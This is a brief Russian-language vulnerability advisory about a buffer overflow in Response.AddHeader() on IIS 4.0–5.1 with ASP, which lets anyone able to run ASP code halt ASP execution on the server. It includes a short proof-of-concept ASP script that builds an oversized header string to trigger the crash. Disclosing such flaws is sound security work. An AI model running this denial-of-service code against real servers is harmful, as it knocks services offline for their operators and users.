В IIS 4.0, IIS 5.0, IIS 5.1 с установленной
поддержкой ASP локальный пользователь
(вообще говоря любой пользователь,
способный выполнить произвольный ASP код)
может вызвать отказ от обслуживания.
Проблема кроется в функции Response.AddHeader(),
она для работы требует имя заголовка и его
значение, если один из этих параметров
будет чрезвычайно длинной строкой (более
35.000 символов), то буфер переполнится и
всякое выполнение ASP кода на сервере
прекратится.
Пример:
<%
Dim i, r
For i=1 to 3500
'each time append 100 characters
'line below may wrap
r = r +
"aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa"
Next
Response.AddHeader "random-header:", r 'this is where it crashes
%>
